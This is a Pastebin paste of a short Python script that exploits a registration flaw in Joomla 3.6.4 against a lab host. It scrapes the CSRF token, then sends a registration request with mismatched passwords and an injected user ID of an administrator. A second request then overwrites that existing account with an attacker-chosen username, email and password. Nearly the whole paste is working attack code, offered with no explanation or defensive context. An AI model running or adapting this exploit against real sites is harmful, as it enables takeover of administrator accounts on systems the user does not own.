Advertisement
Guest User

Untitled

a guest
Oct 2nd, 2018
450
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.34 KB | None | 0 0
  1. import bs4
  2. import requests
  3. import random
  4.  
  5.  
  6. ADMIN_ID = 384
  7. url = 'http://vmweb.lan/Joomla-3.6.4/'
  8.  
  9. form_url = url + 'index.php/component/users/?view=registration'
  10. action_url = url + 'index.php/component/users/?task=registration.register'
  11.  
  12. username = 'user%d' % random.randrange(1000, 10000)
  13. email = username + '@yopmail.com'
  14. password = 'ActualRandomChimpanzee123'
  15.  
  16. user_data = {
  17. 'name': username,
  18. 'username': username,
  19. 'password1': password,
  20. 'password2': password + 'XXXinvalid',
  21. 'email1': email,
  22. 'email2': email,
  23. 'id': '%d' % ADMIN_ID
  24. }
  25.  
  26. session = requests.Session()
  27.  
  28. # Grab original data from the form, including the CSRF token
  29.  
  30. response = session.get(form_url)
  31. soup = bs4.BeautifulSoup(response.text, 'lxml')
  32.  
  33. form = soup.find('form', id='member-registration')
  34. data = {e['name']: e['value'] for e in form.find_all('input')}
  35.  
  36. # Build our modified data array
  37.  
  38. user_data = {'jform[%s]' % k: v for k, v in user_data.items()}
  39. data.update(user_data)
  40.  
  41. # First request will get denied because the two passwords are mismatched
  42.  
  43. response = session.post(action_url, data=data)
  44.  
  45. # The second will work
  46.  
  47. data['jform[password2]'] = data['jform[password1]']
  48. del data['jform[id]']
  49. response = session.post(action_url, data=data)
  50.  
  51. print("Account modified to user: %s [%s]" % (username, email))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement